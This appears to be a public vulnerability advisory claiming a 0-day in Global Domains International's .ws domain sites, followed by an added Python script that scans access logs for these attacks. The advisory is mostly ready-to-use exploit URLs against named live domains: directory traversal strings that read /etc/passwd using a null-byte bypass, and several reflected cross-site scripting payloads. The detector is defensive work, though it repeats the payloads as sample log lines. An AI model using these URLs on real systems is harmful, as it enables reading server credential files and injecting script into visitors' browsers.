====================================================================================================================================
| # Title : Global Domains International Directory Traversal Vulnerability 0-Day |
| # Author : indoushka |
| # email : indoushka4ever@gmail.com |
| # Tested on : Windows 10 Français V.(Pro) |
| # Vendor : http://www.nic.ws |
====================================================================================================================================
# Dork : Copyright © 2014 by Global Domains International, Inc · All Rights Reserved
Directory traversal :
http://www.nic.ws/kvmlm2/index.dhtml?fname=&language=../../../../../../../../../../etc/passwd%00.jpg&lname=&sponsor=gdi&template=11
https://www.website.ws/kvmlm2/index.dhtml?fname=&language=../../../../../../../../../../etc/passwd%00.jpg&lname=&sponsor=gdi&template=11
http://www.7.ws/kvmlm2/index.dhtml?fname=&language=../../../../../../../../../../etc/passwd%00.jpg&lname=&sponsor=gdi&template=11
http://www.movie.ws/kvmlm2/index.dhtml?fname=&language=../../../../../../../../../../etc/passwd%00.jpg&lname=&sponsor=gdi&template=11
http://welcome-back.ws/kvmlm2/index.dhtml?fname=&language=../../../../../../../../../../etc/passwd%00.jpg&lname=&sponsor=gdi&template=11
Cross-site scripting (verified) :
/article.dhtml?article=touring&sponsor=wsnic%22%20onmouseover%3dprompt(771818860)%20bad%3d%22
/kvmlm2/index.dhtml?fname=1%22%20onmouseover%3dprompt(771818860)%20bad%3d%22&language=spanish&lname=&sponsor=gdi&template=11
/members/?language=english'%22()%26%25<ScRiPt%20>prompt(771818860)</ScRiPt>
/orderflow/index.dhtml?sponsor=1'%22()%26%25<ScRiPt%20>prompt(771818860)</ScRiPt>
http://freedom.ws/?language=french%27%22%28%29%26%25%3CScRiPt%20%3Eprompt%28771818860%29%3C/ScRiPt%3E
freedom.ws/show_dvd.dhtml?language=spanish'"()%26%25<ScRiPt >prompt(771818860)</ScRiPt>&sponsor=gditraffic
Greetz :----------------------------------------------------------------------------------------
|
jericho * Larry W. Cashdollar * shadow0075 * djroot.dz * Gjoko 'LiquidWorm' Krstic |
|
================================================================================================
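
Added example, not part of the original advisory or the vendor's code: a Python check that flags the request patterns listed above (traversal sequences and a null byte in a query parameter, injected markup in a query parameter) when reviewing web access logs. The allow-list of language names (taken from the values visible in the URLs above), the Common Log Format layout and the sample log lines are assumptions constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Assumption: the language names seen in this advisory's URLs are the valid set.
KNOWN_LANGUAGES = {"english", "spanish", "french"}

TRAVERSAL = re.compile(r"(^|[\\/])\.\.([\\/]|$)")
MARKUP = re.compile(r"<\s*/?\s*script|[\"'][^<>]*\bon\w+\s*=", re.IGNORECASE)
REQUEST = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')

# Constructed sample access log (documentation-range client addresses).
SAMPLE_LOG = """\
192.0.2.10 - - [01/Jan/2024:00:00:01 +0000] "GET /kvmlm2/index.dhtml?fname=&language=spanish&lname=&sponsor=gdi&template=11 HTTP/1.1" 200 5120
192.0.2.11 - - [01/Jan/2024:00:00:02 +0000] "GET /kvmlm2/index.dhtml?fname=&language=../../../../../../../../../../etc/passwd%00.jpg&lname=&sponsor=gdi&template=11 HTTP/1.1" 200 1843
192.0.2.12 - - [01/Jan/2024:00:00:03 +0000] "GET /kvmlm2/index.dhtml?fname=1%22%20onmouseover%3dprompt(771818860)%20bad%3d%22&language=spanish&lname=&sponsor=gdi&template=11 HTTP/1.1" 200 5164
192.0.2.13 - - [01/Jan/2024:00:00:04 +0000] "GET /members/?language=english'%22()%26%25<ScRiPt%20>prompt(771818860)</ScRiPt> HTTP/1.1" 200 4410
""".splitlines()


def classify(target):
    """Return sorted findings for one request target (path plus query)."""
    findings = set()
    for name, value in parse_qsl(urlsplit(target).query, keep_blank_values=True):
        if "\x00" in value:                      # decoded %00 truncation marker
            findings.add(f"{name}:null-byte")
        if TRAVERSAL.search(value):              # ../ or ..\ path component
            findings.add(f"{name}:traversal")
        if MARKUP.search(value):                 # script tag or quoted on*= attribute
            findings.add(f"{name}:markup")
        if name == "language" and value.lower() not in KNOWN_LANGUAGES:
            findings.add("language:not-allow-listed")
    return sorted(findings)


def scan(log_lines):
    """Yield (line_number, findings) for access-log lines that trip a check."""
    for number, line in enumerate(log_lines, 1):
        match = REQUEST.search(line)
        findings = classify(match.group(1)) if match else []
        if findings:
            yield number, findings


if __name__ == "__main__":
    for number, findings in scan(SAMPLE_LOG):
        print(number, ", ".join(findings))
```

The same allow-list comparison, applied server-side before the language value is used to build a file path or written into the page, rejects all of the requests above.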